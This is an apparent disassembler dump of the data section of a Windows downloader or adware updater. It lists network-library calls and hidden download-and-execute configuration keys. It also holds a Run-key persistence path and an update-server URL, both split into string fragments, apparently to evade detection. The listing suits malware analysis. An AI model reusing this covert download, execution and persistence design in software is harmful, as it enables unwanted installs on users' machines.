assume cs:HSho
;org 416000h
assume es:nothing, ss:nothing, ds:HSho, fs:nothing, gs:nothing
dword_416000 dd 400h dup(0) dword_417000 dd 0 dd offset sub_4082E0
dd offset sub_411891
dword_41700C dd 0 dword_417010 dd 0 dword_417014 dd 3 dup(0) dd offset off_414AD4
align 8
dd 482Eh
dword_41702C dd 6325h off_417030 dd offset off_414AD4 ; DATA XREF: HSho:00414E1C�o
align 8
a_pavcexception db '.PAVCException@@',0
align 4
aR_0: ; DATA XREF: HSho:00402558�o
unicode 0, <r>,0
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_4027A4:loc_4027ED�o
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_4027A4:loc_402808�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_4027A4+79�o
align 10h
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_4027A4+8B�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_4027A4+9D�o
align 4
aD db '%d',0 ; DATA XREF: sub_402A1E+F6�o
align 4
aOpen db 'OPEN',0 ; DATA XREF: sub_402C48+23D�o
align 4
asc_4170B4: ; DATA XREF: sub_402C48+1B5�o
unicode 0, <)>,0
aCrcOkInstall db 'crc ok, Install(',0 ; DATA XREF: sub_402C48+19B�o
align 4
a_old db '.old',0 ; DATA XREF: sub_402C48+159�o
align 4
aCrcFailed db 'crc failed:',0 ; DATA XREF: sub_402C48+E9�o
aInstallzip db 'InstallZip()',0Ah,0 ; DATA XREF: sub_402C48+7B�o
align 10h
a_bin db '.bin',0 ; DATA XREF: sub_402C48+3D�o
align 4
aRetryD db '&retry=%d',0 ; DATA XREF: sub_402F1E+4C�o
align 4
a0: ; DATA XREF: sub_40592B+6C�o
unicode 0, <0>,0
a02x db '%02X',0 ; DATA XREF: sub_402FAF+D1�o
align 10h
dword_417110 dd 0D321C942h, 2212B3F2h, 6608AB02h, 0 ; sub_4030F7+8E�o
dword_417120 dd 6325h dword_417124 dd 74696E49h, 646E7542h, 0A656Chdword_417130 dd 5Ch ; sub_405327+38�o ...
aWindows db 'windows',0 ; DATA XREF: sub_403488+BEB�o
aCrc db 'crc',0 ; DATA XREF: sub_403488:loc_403FB6�o
aIdentifier db 'identifier',0 ; DATA XREF: sub_403488:loc_403F3F�o
align 4
aVersion_0 db 'version',0 ; DATA XREF: sub_403488:loc_403ECE�o
aNewupdater db 'newupdater',0 ; DATA XREF: sub_403488:loc_403E5E�o
align 10h
aWait db 'wait',0 ; DATA XREF: sub_403488:loc_403DEE�o
align 4
aExecute db 'execute',0 ; DATA XREF: sub_403488:loc_403D7E�o
aHide db 'hide',0 ; DATA XREF: sub_403488:loc_403D0E�o
align 4
aSavepath db 'SavePath',0 ; DATA XREF: sub_403488:loc_403CA3�o
align 4
aSaveas db 'SaveAs',0 ; DATA XREF: sub_403488:loc_403C2C�o
align 4
aParameters db 'parameters',0 ; DATA XREF: sub_403488:loc_403BBB�o
align 4
aFilename db 'filename',0 ; DATA XREF: sub_403488:loc_403B4A�o
align 4
aRequiredfile db 'requiredfile',0 ; DATA XREF: sub_403488:loc_403AD9�o
align 4
aKeyvalue db 'keyvalue',0 ; DATA XREF: sub_403488:loc_403A68�o
align 10h
aKey db 'key',0 ; DATA XREF: sub_403488:loc_4039FD�o
aRootkey db 'rootkey',0 ; DATA XREF: sub_403488+508�o
aDownload db 'download',0 ; DATA XREF: sub_403488:loc_403864�o
; sub_404484+5F�o
align 4
aWrNextupdate db 'WR\nextupdate',0 ; DATA XREF: sub_403488+3A6�o
align 4
aNextupdate db 'nextupdate',0 ; DATA XREF: sub_403488:loc_403753�o
align 4
aWrP db 'WR\p',0 ; DATA XREF: sub_403488+282�o
align 4
aPaid db 'paid',0 ; DATA XREF: sub_403488:loc_403632�o
align 4
aWrConfigversio db 'WR\configversion',0 ; DATA XREF: sub_403488+161�o
align 4
aConfigversio_0 db 'configversion',0 ; DATA XREF: sub_403488+84�o
align 4
aS db '%s',0 ; DATA XREF: sub_403488+6E�o
; sub_403488+4EA�o ...
align 4
aParsexml db 'ParseXML()',0Ah,0 ; DATA XREF: sub_403488+2F�o
dword_417238 dd 2933BF80h, 11D27B36h, 0C0000EB2h, 603E984Fh ; sub_4043E6+19�o ...
dword_417248 dd 3Ah dword_41724C dd 765C5257h, 69737265h, 6E6Fh ; sub_404605+320�o ...
dword_417258 dd 706D742Eh, 0 dword_417260 dd 6C6F2320h, 3A64haDefaultvalue db 'defaultvalue',0 ; DATA XREF: sub_405150+88�o
; sub_405E1F+214�o
align 4
asc_417278: ; DATA XREF: sub_404B40+47A�o
unicode 0, <}>,0
a000001 db '000001',0 ; DATA XREF: sub_404B40+421�o
align 4
a0a887397a5f240 db '0A887397A5F240675EEF4D35019B6883A6FA5D6C5EF8711536AC4C8FA4DA76476'
; DATA XREF: sub_404B40+317�o
db 'DE96109318D40A797',0
align 4
a000000 db '-0000-00',0 ; DATA XREF: sub_404B40+309�o
align 4
aHardwareDesc_0 db 'HARDWARE\DESCRIPTION\System\SystemBiosDate',0
; DATA XREF: sub_404B40+216�o
align 10h
asc_417310: ; DATA XREF: sub_404B40+1A6�o
unicode 0, <->,0
aHardwareDescri db 'HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz',0
; DATA XREF: sub_404B40+164�o
a08x db '%08X',0 ; DATA XREF: sub_404B40+120�o
align 10h
asc_417350: ; DATA XREF: sub_404B40+CA�o
unicode 0, <{>,0
a04x db '%04X',0 ; DATA XREF: sub_404B40+A1�o
; sub_404B40+18E�o
align 4
asc_41735C: ; DATA XREF: sub_405150+F8�o
unicode 0, < >,0
aNner1 db 'nner1',0 ; DATA XREF: sub_405150+6E�o
align 4
aUnRu db 'un\ru',0 ; DATA XREF: sub_405150+5D�o
align 10h
aTversionR db 'tVersion\R',0 ; DATA XREF: sub_405150+4C�o
align 4
aFtWindowsCurre db 'ft\Windows\Curren',0 ; DATA XREF: sub_405150+3B�o
align 10h
aSoftwareMicros db 'SOFTWARE\Microso',0 ; DATA XREF: sub_405150+20�o
align 4
aGversion db 'gversion',0 ; DATA XREF: sub_405327+5A�o
align 10h
aConfi db 'confi',0 ; DATA XREF: sub_405327+49�o
align 4
aWr db 'WR',0 ; DATA XREF: sub_405327+21�o
; sub_40543F+1B�o ...
align 4
aDate db 'date',0 ; DATA XREF: sub_40543F+64�o
align 4
aTup db 'tup',0 ; DATA XREF: sub_40543F+54�o
aNex db 'nex',0 ; DATA XREF: sub_40543F+44�o
aP_0: ; DATA XREF: sub_40558C+49�o
unicode 0, <p>,0
aI: ; DATA XREF: sub_405693+5A�o
; sub_4057AB+57�o
unicode 0, <i>,0
aR: ; DATA XREF: sub_405693+38�o
; sub_4057AB+35�o ...
unicode 0, <R>,0
aW: ; DATA XREF: sub_405693+21�o
; sub_4057AB+1A�o ...
unicode 0, <W>,0
asc_4173DC: ; DATA XREF: sub_4057AB+E4�o
unicode 0, <,>,0
aCmd db 'cmd',0 ; DATA XREF: sub_40592B+57�o
aMd db 'md',0 ; DATA XREF: sub_405A64+6B�o
align 4
aC: ; DATA XREF: sub_405A64+5A�o
unicode 0, <c>,0
aAffid db 'affID',0 ; DATA XREF: sub_405B91+1E7�o
align 4
aVersion_1 db '\version',0 ; DATA XREF: sub_405E1F+264�o
align 10h
a11866787a5f240 db '11866787A5F240675EE6610530A652BC94C74E756BC56C0935BA7D9087C160476'
; DATA XREF: sub_405E1F+228�o
db 'CDF5E0330BA48BC9CEF42506DCC7A072F8F48BF97C0564B70',0
align 4
a_exe_tmp db '.exe.tmp',0 ; DATA XREF: sub_405E1F+134�o
align 10h
aInu db 'inu',0 ; DATA XREF: sub_405E1F+129�o
aOf db 'of',0 ; DATA XREF: sub_405E1F+115�o
align 4
aMr db 'mr',0 ; DATA XREF: sub_405E1F+104�o
align 4
aE: ; DATA XREF: sub_405E1F+DD�o
unicode 0, <e>,0
a_ex db '.ex',0 ; DATA XREF: sub_405E1F+B5�o
aFinu db 'finu',0 ; DATA XREF: sub_405E1F+A1�o
align 4
aRo db 'ro',0 ; DATA XREF: sub_405E1F+90�o
align 10h
aM db '\m',0 ; DATA XREF: sub_405E1F+64�o
align 4
aSei db 'sei ',0Ah,0 ; DATA XREF: sub_406208+49�o
align 4
aShellexecuteex db 'ShellExecuteEx',0 ; DATA XREF: sub_406208+27�o
align 4
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_406208+15�o
asc_4174C8: ; DATA XREF: sub_406374+60�o
unicode 0, <\>,0
asc_4174CC: ; DATA XREF: sub_406374+AC�o
unicode 0, <\>,0
asc_4174D0: ; DATA XREF: sub_406374+107�o
unicode 0, <\>,0
asc_4174D4: ; DATA XREF: sub_406374+117�o
unicode 0, <\>,0
asc_4174D8: ; DATA XREF: sub_40671B+8A�o
unicode 0, <\>,0
asc_4174DC: ; DATA XREF: sub_40671B+D6�o
unicode 0, <\>,0
asc_4174E0: ; DATA XREF: sub_40671B+131�o
unicode 0, <\>,0
asc_4174E4: ; DATA XREF: sub_40671B+141�o
unicode 0, <\>,0
asc_4174E8: ; DATA XREF: HSho:00406DD4�o
unicode 0, <\>,0
asc_4174EC: ; DATA XREF: HSho:00406E20�o
unicode 0, <\>,0
asc_4174F0: ; DATA XREF: HSho:00406E7B�o
unicode 0, <\>,0
asc_4174F4: ; DATA XREF: HSho:00406E8B�o
unicode 0, <\>,0
asc_4174F8: ; DATA XREF: HSho:004072F7�o
unicode 0, <\>,0
asc_4174FC: ; DATA XREF: HSho:00407343�o
unicode 0, <\>,0
asc_417500: ; DATA XREF: HSho:0040739E�o
unicode 0, <\>,0
asc_417504: ; DATA XREF: HSho:004073AE�o
unicode 0, <\>,0
aD_0 db '%d',0 ; DATA XREF: sub_40831F+7C�o
align 4
asc_41750C db '&x=',0 ; DATA XREF: sub_40831F+92�o
aI_0 db '&i=',0 ; DATA XREF: sub_40831F+C9�o
aP_1 db '&p=',0 ; DATA XREF: sub_40831F+100�o
aCmd_0 db '&cmd=',0 ; DATA XREF: sub_40831F+10A�o
align 10h
aGuid db '&GUID=',0 ; DATA XREF: sub_40831F+161�o
align 4
aConfigversion db '&configversion=',0 ; DATA XREF: sub_40831F+198�o
aVersion db '&version=',0 ; DATA XREF: sub_40831F+1A7�o
align 4
aHtt db 'htt',0 ; DATA XREF: sub_40831F+4CF�o
aP db 'p://',0 ; DATA XREF: sub_40831F+4E9�o
align 10h
aWr_mc db 'wr.mc',0 ; DATA XREF: sub_40831F+503�o
align 4
aBoo_co db 'boo.co',0 ; DATA XREF: sub_40831F+51D�o
align 10h
aMReta db 'm/reta',0 ; DATA XREF: sub_40831F+537�o
align 4
aDpu_php? db 'dpu.php?',0 ; DATA XREF: sub_40831F+551�o
align 4
aOld db 'old',0 ; DATA XREF: sub_408D9F+3C1�o
dword_417578 dd 2933BF81h, 11D27B36h, 0C0000EB2h, 603E984Fh ; sub_409AF0+4A�o ...
dword_417588 dd 2 dup(0) dd 0C0h, 46000000h
aNeedDictiona_0 db 'need dictionary',0 ; DATA XREF: HSho:off_4132D0�o
aStreamEnd db 'stream end',0 ; DATA XREF: HSho:004132D4�o
align 4
aFileError db 'file error',0 ; DATA XREF: HSho:004132DC�o
align 10h
aStreamError db 'stream error',0 ; DATA XREF: HSho:004132E0�o
align 10h
aDataError db 'data error',0 ; DATA XREF: HSho:004132E4�o
align 4
aInsufficientMe db 'insufficient memory',0 ; DATA XREF: HSho:004132E8�o
aBufferError db 'buffer error',0 ; DATA XREF: HSho:004132EC�o
align 10h
aIncompatibleVe db 'incompatible version',0 ; DATA XREF: HSho:004132F0�o
align 4
aInvalidLiteral db 'invalid literal/length code',0 ; DATA XREF: sub_40A04E+342�o
aInvalidDistanc db 'invalid distance code',0 ; DATA XREF: sub_40A04E+60E�o
align 4
aInvalidBlockTy db 'invalid block type',0 ; DATA XREF: sub_40AF6D+29B�o
align 10h
aInvalidStoredB db 'invalid stored block lengths',0 ; DATA XREF: sub_40AF6D+3D8�o
align 10h
aTooManyLengthO db 'too many length or distance symbols',0 ; DATA XREF: sub_40AF6D+7D2�o
aInvalidBitLeng db 'invalid bit length repeat',0 ; DATA XREF: sub_40AF6D+DE1�o
align 10h
aOversubscribed db 'oversubscribed dynamic bit lengths tree',0 ; DATA XREF: sub_40CBFE+65�o
aIncompleteDyna db 'incomplete dynamic bit lengths tree',0 ; DATA XREF: sub_40CBFE+7F�o
aOversubscrib_0 db 'oversubscribed literal/length tree',0 ; DATA XREF: sub_40CCA6+84�o
align 10h
aIncompleteLite db 'incomplete literal/length tree',0 ; DATA XREF: sub_40CCA6+96�o
align 10h
aOversubscrib_1 db 'oversubscribed distance tree',0 ; DATA XREF: sub_40CCA6+119�o
align 10h
aIncompleteDist db 'incomplete distance tree',0 ; DATA XREF: sub_40CCA6+12B�o
align 4
aEmptyDistanceT db 'empty distance tree with lengths',0 ; DATA XREF: sub_40CCA6+144�o
align 10h
aInvalidDista_0 db 'invalid distance code',0 ; DATA XREF: sub_40CE56+3A8�o
align 4
aInvalidLiter_0 db 'invalid literal/length code',0 ; DATA XREF: sub_40CE56+586�o
a1_1_3 db '1.1.3',0 ; DATA XREF: HSho:0040D98A�o
align 4
a1_1_3_0 db '1.1.3',0 ; DATA XREF: sub_40DAB5+6�o
align 4
byte_4177F4 db 31h ; DATA XREF: sub_40DAB5+20�r
db 2Eh, 31h, 2Eh
dd 33h
aUnknownCompres db 'unknown compression method',0 ; DATA XREF: sub_40DC35+D1�o
align 4
aInvalidWindowS db 'invalid window size',0 ; DATA XREF: sub_40DC35+113�o
aIncorrectHeade db 'incorrect header check',0 ; DATA XREF: sub_40DC35+1B1�o
align 4
aNeedDictionary db 'need dictionary',0 ; DATA XREF: sub_40DC35+3C3�o
aIncorrectDataC db 'incorrect data check',0 ; DATA XREF: sub_40DC35+64C�o
align 4
asc_41786C: ; DATA XREF: sub_40FE9E+39�o
unicode 0, <\>,0
aUt db 'UT',0 ; DATA XREF: sub_40FF4C+4AC�o
align 4
a__ db '../',0 ; DATA XREF: sub_4107B2+32D�o
a___0 db '..\',0 ; DATA XREF: sub_4107B2+349�o
aUnknownZipResu db 'unknown zip result code',0 ; DATA XREF: HSho:loc_410D29�o
aSuccess db 'Success',0 ; DATA XREF: HSho:loc_410EAF�o
aCuldnTDuplicat db 'Culdn',27h,'t duplicate handle',0 ; DATA XREF: HSho:loc_410EBB�o
align 4
aCouldnTCreateO db 'Couldn',27h,'t create/open file',0 ; DATA XREF: HSho:loc_410EC7�o
align 4
aFailedToAlloca db 'Failed to allocate memory',0 ; DATA XREF: HSho:loc_410ED3�o
align 10h
aErrorWritingTo db 'Error writing to file',0 ; DATA XREF: HSho:loc_410EDF�o
align 4
aFileNotFoundIn db 'File not found in the zipfile',0 ; DATA XREF: HSho:loc_410EEB�o
align 4
aStillMoreDataT db 'Still more data to unzip',0 ; DATA XREF: HSho:loc_410EF7�o
align 4
aZipfileIsCorru db 'Zipfile is corrupt or not a zipfile',0 ; DATA XREF: HSho:loc_410F00�o
aErrorReadingFi db 'Error reading file',0 ; DATA XREF: HSho:loc_410F09�o
align 4
aCallerFaultyAr db 'Caller: faulty arguments',0 ; DATA XREF: HSho:loc_410F12�o
align 4
aCallerTheFileH db 'Caller: the file had already been partially unzipped',0
; DATA XREF: HSho:loc_410F1B�o
align 10h
aCallerCanOnlyG db 'Caller: can only get memory of a memory zipfile',0
; DATA XREF: HSho:loc_410F24�o
aCallerNotEnoug db 'Caller: not enough space allocated for memory zipfile',0
; DATA XREF: HSho:loc_410F2D�o
align 4
aCallerThereWas db 'Caller: there was a previous error',0 ; DATA XREF: HSho:loc_410F36�o
align 4
aCallerAddition db 'Caller: additions to the zip have already been ended',0
; DATA XREF: HSho:loc_410F3F�o
align 4
aCallerMixingCr db 'Caller: mixing creation and opening of zip',0
; DATA XREF: HSho:loc_410F48�o
align 10h
aZipBugInternal db 'Zip-bug: internal initialisation not completed',0
; DATA XREF: HSho:loc_410F51�o
align 10h
aZipBugTryingTo db 'Zip-bug: trying to seek the unseekable',0 ; DATA XREF: HSho:loc_410F5A�o
align 4
aZipBugTheAntic db 'Zip-bug: the anticipated size turned out wrong',0
; DATA XREF: HSho:loc_410F63�o
align 4
aZipBugTriedToC db 'Zip-bug: tried to change mind, but not allowed',0
; DATA XREF: HSho:loc_410F6C�o
align 4
aZipBugAnIntern db 'Zip-bug: an internal error during flation',0
; DATA XREF: HSho:loc_410F75�o
align 10h
off_417BB0 dd offset off_414AD4 ; DATA XREF: HSho:off_414AF0�o
; HSho:00414B2C�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
align 10h
dword_417BD0 dd 1 align 8
dword_417BD8 dd 0DF0B3D60h, 101B548Fh, 8658Eh, 19D12B2Bhoff_417BE8 dd offset off_414AD4 ; DATA XREF: HSho:off_414B38�o
; HSho:00414B74�o ...
align 10h
a_?av_com_error db '.?AV_com_error@@',0
align 8
a97 db '97',0 ; DATA XREF: sub_401ACF+24�o
; sub_401ACF+64�o ...
align 4
dd 7FFh dup(0)
byte_419C08 db 0 ; DATA XREF: HSho:00401B9A�r
align 4
byte_419C0C db 0 ; DATA XREF: HSho:00401BB5�r
align 10h
byte_419C10 db 0 ; DATA XREF: sub_401C92+25�r
align 4
byte_419C14 db 0 ; DATA XREF: sub_401D8A+A�r
align 4
byte_419C18 db 0 ; DATA XREF: sub_401D8A+25�r
align 4
byte_419C1C db 0 ; DATA XREF: HSho:00401E90�r
align 10h
byte_419C20 db 0 ; DATA XREF: HSho:00401EAB�r
align 4
byte_419C24 db 0 ; DATA XREF: HSho:00401F65�r
align 4
byte_419C28 db 0 ; DATA XREF: HSho:loc_401FCB�r
align 4
byte_419C2C db 0 ; DATA XREF: HSho:00402050�r
align 10h
byte_419C30 db 0 ; DATA XREF: HSho:0040206B�r
align 4
byte_419C34 db 0 ; DATA XREF: HSho:loc_402104�r
align 4
byte_419C38 db 0 ; DATA XREF: sub_402296+A�r
align 4
dword_419C3C dd 0 byte_419C40 db 0 ; DATA XREF: sub_402FAF+1B�r
; sub_402FAF:loc_4030A8�o ...
align 4
word_419C44 dw 0 ; DATA XREF: sub_404B40+2E�r
; sub_404B40+2FA�o ...
align 4
dword_419C48 dd 0 dword_419C4C dd 0 dword_419C50 dd 0 dword_419C54 dd 0 dword_419C58 dd 0 dword_419C5C dd 0 dword_419C60 dd 0 dword_419C64 dd 0 dword_419C68 dd 0 dword_419C6C dd 0 dword_419C70 dd 0 dword_419C74 dd 0 dword_419C78 dd 0 dword_419C7C dd 0 dword_419C80 dd 0 dword_419C84 dd 0 dword_419C88 dd 0 dword_419C8C dd 0 dword_419C90 dd 0 ; sub_408310+3�o ...
aJSJSJSJS db 'ssss',0
align 4
aJSJS db 'ss',0
align 4
dd 345000h, 345050h, 73EA86D4h, 801h dup(0)
dd offset off_4132CC
align 10h
dword_41BCD0 dd 0 ; sub_408D9F+41�o ...
dword_41BCD4 dd 0 ; sub_410FDB+73�w ...
dword_41BCD8 dd 0 dword_41BCDC dd 3 dup(0) dword_41BCE8 dd 0 dword_41BCEC dd 0 dword_41BCF0 dd 0 dword_41BCF4 dd 0 dword_41BCF8 dd 4 dup(0) dword_41BD08 dd 0 dword_41BD0C dd 0FFFFFFFFh ; HSho:004116BE�w
dword_41BD10 dd 0FFFFFFFFh ; sub_411646+1A�o ...
dd 4BBh dup(0)
dd 140h, 12018h, 65724301h, 46657461h, 41656C69h, 65520100h
dd 69466461h, 100656Ch, 736F6C43h, 6E614865h, 656C64h
dd 74654701h, 656C6946h, 657A6953h, 65470100h, 73614C74h
dd 72724574h, 100726Fh
aGetcurrentdire db 'GetCurrentDirectoryA',0
db 1, 43h, 72h
aEatedirectorya db 'eateDirectoryA',0
db 1
aRemovedirector db 'RemoveDirectoryA',0
db 1, 53h, 65h
aTfileattribute db 'tFileAttributesA',0
db 1, 47h, 65h
aTfileattribu_0 db 'tFileAttributesA',0
db 1, 55h, 6Eh
aMapviewoffile db 'mapViewOfFile',0
dw 4601h
aIndfirstfilea db 'indFirstFileA',0
dw 5301h
aEtcurrentdirec db 'etCurrentDirectoryA',0
db 1
aGlobalfree db 'GlobalFree',0
db 1
aWritefile db 'WriteFile',0
db 1
aFreelibrary db 'FreeLibrary',0
db 1
aGlobalrealloc db 'GlobalReAlloc',0
db 1
aGlobalalloc db 'GlobalAlloc',0
db 1
aGetprocaddress db 'GetProcAddress',0
db 1
aWidechartomult db 'WideCharToMultiByte',0
db 1, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 4D01h
aApviewoffile db 'apViewOfFile',0
db 1, 43h, 72h
aEatefilemappin db 'eateFileMappingA',0
db 1, 6Ch, 73h
aTrcata db 'trcatA',0
db 1
aSetlasterror db 'SetLastError',0
db 1, 46h, 69h
aNdclose db 'ndClose',0
dd 6E694601h, 78654E64h, 6C694674h, 1004165h, 53746547h
dd 74726174h, 6E497075h, 416F66h, 74654701h, 75646F4Dh
dd 6148656Ch, 656C646Eh, 53010041h, 69467465h, 6954656Ch
dd 100656Dh
aDosdatetimetof db 'DosDateTimeToFileTime',0
dw 5301h
aYstemtimetofil db 'ystemTimeToFileTime',0
db 1
aGetcurrentproc db 'GetCurrentProcess',0
db 1
aDuplicatehandl db 'DuplicateHandle',0
db 1
aGetfiletype db 'GetFileType',0
db 1, 53h, 65h
aTfilepointer db 'tFilePointer',0
db 1, 4Ch, 6Fh
aCalfree db 'calFree',0
db 1
aInterlockedinc db 'InterlockedIncrement',0
dw 4301h
aReatemutexa db 'reateMutexA',0
db 1
aGetvolumeinfor db 'GetVolumeInformationA',0
db 1
aGetsystemdefau db 'GetSystemDefaultLCID',0
db 1, 6Ch, 73h
aTrlena db 'trlenA',0
db 1
aGetlocaleinfoa db 'GetLocaleInfoA',0
db 1
aInterlockeddec db 'InterlockedDecrement',0
db 1, 6Ch, 73h
aTrcpyna db 'trcpynA',0
db 1
aLstrcpya db 'lstrcpyA',0
dw 5701h
aAitforsingleob db 'aitForSingleObject',0
db 1
aGetwindowsdire db 'GetWindowsDirectoryA',0
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
db 1, 4Ch, 6Fh
aAdlibrarya db 'adLibraryA',0
db 1
aSleep db 'Sleep',0
dw 4D00h
dd 1, 1000120h, 43676552h, 65736F6Ch, 79654Bh, 67655201h
dd 6E65704Fh, 4579654Bh, 1004178h, 53676552h, 61567465h
dd 4565756Ch, 1004178h, 43676552h, 74616572h, 79654B65h
dd 417845h, 67655201h, 72657551h, 6C615679h, 78456575h
dd 5A000041h, 0E8000001h, 0FF000120h, 12FF1B10h, 164EFF1Bh
dd 0FF03ABFFh, 0ADFF039Eh, 0B63FF03h, 0FF0339FFh, 33FF15C4h
dd 1021FF16h, 0FF039CFFh, 1CFF039Ah, 35AFF02h, 0FF0320FFh
dd 17FF035Ch, 959FF02h, 0FF0219FFh, 64000337h, 40000001h
dd 1000121h
a?is_open@ifstr db '?is_open@ifstream@@QBEHXZ',0
dw 3F01h
aRead@istream@@ db 'read@istream@@QAEAAV1@PADH@Z',0
db 1, 3Fh, 67h
aCount@istream@ db 'count@istream@@QBEHXZ',0
dw 3F01h
aClose@ifstream db 'close@ifstream@@QAEXXZ',0
db 1
a??_difstream@@ db '??_Difstream@@QAEXXZ',0
db 1, 3Fh, 6Fh
aPen@ifstream@@ db 'pen@ifstream@@QAEXPBDHH@Z',0
dw 3F01h
aSh_read@filebu db 'sh_read@filebuf@@2HB',0
db 1, 2 dup(3Fh)
a0ifstream@@qae db '0ifstream@@QAE@XZ',0
dw 3F01h
aFail@ios@@qbeh db 'fail@ios@@QBEHXZ',0
align 2
dw 170h
dd 21680000h, 3F010001h, 243F313Fh, 69736162h, 74735F63h
dd 676E6972h, 3F554440h, 61686324h, 72745F72h, 73746961h
dd 73404440h, 40406474h, 61243F56h, 636F6C6Ch, 726F7461h
dd 32404440h, 74734040h, 51404064h, 58404541h, 3F01005Ah
dd 243F303Fh, 69736162h, 74735F63h, 676E6972h, 3F554440h
dd 61686324h, 72745F72h, 73746961h, 73404440h, 40406474h
dd 61243F56h, 636F6C6Ch, 726F7461h, 32404440h, 74734040h
dd 51404064h, 41404541h, 243F5642h, 6F6C6C61h, 6F746163h
dd 40444072h, 5A404031h, 733F0100h, 74736275h, 243F4072h
dd 69736162h, 74735F63h, 676E6972h, 3F554440h, 61686324h
dd 72745F72h, 73746961h, 73404440h, 40406474h, 61243F56h
dd 636F6C6Ch, 726F7461h, 32404440h, 74734040h, 51404064h
dd 413F4542h, 40323156h, 5A404949h, 663F0100h, 5F646E69h
dd 7473616Ch, 40666F5Fh, 6162243Fh, 5F636973h, 69727473h
dd 4440676Eh, 63243F55h, 5F726168h, 69617274h, 44407374h
dd 64747340h, 3F564040h, 6C6C6124h, 7461636Fh, 4440726Fh
dd 40403240h, 40647473h, 45425140h, 40494449h, 3F01005Ah
dd 736F706Eh, 62243F40h, 63697361h, 7274735Fh, 40676E69h
dd 243F5544h, 72616863h, 6172745Fh, 40737469h, 74734044h
dd 56404064h, 6C61243Fh, 61636F6Ch, 40726F74h, 40324044h
dd 64747340h, 49324040h, 3F010042h, 243F343Fh, 69736162h
dd 74735F63h, 676E6972h, 3F554440h, 61686324h, 72745F72h
dd 73746961h, 73404440h, 40406474h, 61243F56h, 636F6C6Ch
dd 726F7461h, 32404440h, 74734040h, 51404064h, 41414541h
dd 40313056h, 30564241h, 5A404031h, 3F3F0100h, 62243F30h
dd 63697361h, 7274735Fh, 40676E69h, 243F5544h, 72616863h
dd 6172745Fh, 40737469h, 74734044h, 56404064h, 6C61243Fh
dd 61636F6Ch, 40726F74h, 40324044h, 64747340h, 41514040h
dd 42414045h, 40313056h, 1005A40h, 7373613Fh, 406E6769h
dd 6162243Fh, 5F636973h, 69727473h, 4440676Eh, 63243F55h
dd 5F726168h, 69617274h, 44407374h, 64747340h, 3F564040h
dd 6C6C6124h, 7461636Fh, 4440726Fh, 40403240h, 40647473h
dd 45415140h, 31564141h, 42504032h, 5A4044h, 5F633F01h
dd 40727473h, 6162243Fh, 5F636973h, 69727473h, 4440676Eh
dd 63243F55h, 5F726168h, 69617274h, 44407374h, 64747340h
dd 3F564040h, 6C6C6124h, 7461636Fh, 4440726Fh, 40403240h
dd 40647473h, 45425140h, 58444250h, 3F01005Ah, 657A6973h
dd 62243F40h, 63697361h, 7274735Fh, 40676E69h, 243F5544h
dd 72616863h, 6172745Fh, 40737469h, 74734044h, 56404064h
dd 6C61243Fh, 61636F6Ch, 40726F74h, 40324044h, 64747340h
dd 42514040h, 5A584945h, 3F3F0100h, 64747338h, 41594040h
dd 42414E5Fh, 62243F56h, 63697361h, 7274735Fh, 40676E69h
dd 243F5544h, 72616863h, 6172745Fh, 40737469h, 74734044h
dd 56404064h, 6C61243Fh, 61636F6Ch, 40726F74h, 40324044h
dd 30403040h, 1005A40h, 3F343F3Fh, 73616224h, 735F6369h
dd 6E697274h, 55444067h, 6863243Fh, 745F7261h, 74696172h
dd 40444073h, 40647473h, 243F5640h, 6F6C6C61h, 6F746163h
dd 40444072h, 73404032h, 40406474h, 41454151h, 31305641h
dd 44425040h, 5A40h, 17Ch, 1219Ch, 72747301h, 7970636Eh
dd 74610100h, 1006C6Fh, 656D6974h, 74610100h, 100696Fh
dd 7274735Fh, 6D63696Eh, 5F010070h, 64727473h, 1007075h
dd 73626D5Fh, 727075h, 72747301h, 746163h, 48455F01h, 6F72705Fh
dd 676F6Ch, 6D656D01h, 797063h, 706F6601h, 1006E65h, 6C6C616Dh
dd 100636Fh, 73727473h, 1007274h, 6F6C6366h, 1006573h
dd 65657266h, 74660100h, 6C6C65h, 435F5F01h, 72467878h
dd 48656D61h, 6C646E61h, 1007265h, 7878435Fh, 6F726854h
dd 63784577h, 69747065h, 1006E6Fh, 69727073h, 66746Eh
dd 73637701h, 6E656Ch, 626D5F01h, 706D6373h, 73660100h
dd 6B6565h, 756F7401h, 72657070h, 74730100h, 6E656C72h
dd 74730100h, 79706372h, 6D5F0100h, 626E7362h, 797063h
dd 6D656D01h, 746573h, 6C616301h, 636F6Ch, 72747301h, 706D63h
dd 746D6701h, 656D69h, 626D5F01h, 72747373h, 3F3F0100h
dd 70797431h, 6E695F65h, 40406F66h, 40454155h, 1005A58h
dd 6C645F5Fh, 656E6F6Ch, 746978h, 6E6F5F01h, 74697865h
dd 655F0100h, 746978h, 63585F01h, 69467470h, 7265746Ch
dd 78650100h, 1007469h, 65675F5Fh, 69616D74h, 6772616Eh
dd 5F010073h, 646D6361h, 1006E6Ch, 696E695Fh, 72657474h
dd 5F01006Dh, 7465735Fh, 72657375h, 6874616Dh, 727265h
dd 64615F01h, 7473756Ah, 6964665Fh, 5F010076h, 5F5F705Fh
dd 6D6D6F63h, 65646Fh, 705F5F01h, 6D665F5Fh, 65646Fh, 735F5F01h
dd 615F7465h, 745F7070h, 657079h, 78655F01h, 74706563h
dd 6E61685Fh, 72656C64h, 66010033h, 64616572h, 635F0100h
dd 72746E6Fh, 70666C6Fh, 1870000h, 22A40000h, 43010001h
dd 696E556Fh, 6974696Eh, 7A696C61h, 4F010065h, 7552656Ch
dd 4301006Eh, 6572436Fh, 49657461h, 6174736Eh, 65636Eh
dd 496F4301h, 6974696Eh, 7A696C61h, 91000065h, 60000001h
dd 0FF000122h, 9FF000Ch, 8FF00h, 0FF0095FFh, 6FF0096h
dd 7FF00h, 0FF00C8FFh, 9E000002h, 88000001h, 1000122h
dd 69464853h, 704F656Ch, 74617265h, 416E6F69h, 1AA0000h
dd 22900000h, 43010001h, 5279706Fh, 746365h, 75714501h
dd 65526C61h, 1007463h, 72616843h, 65707055h, 1004172h
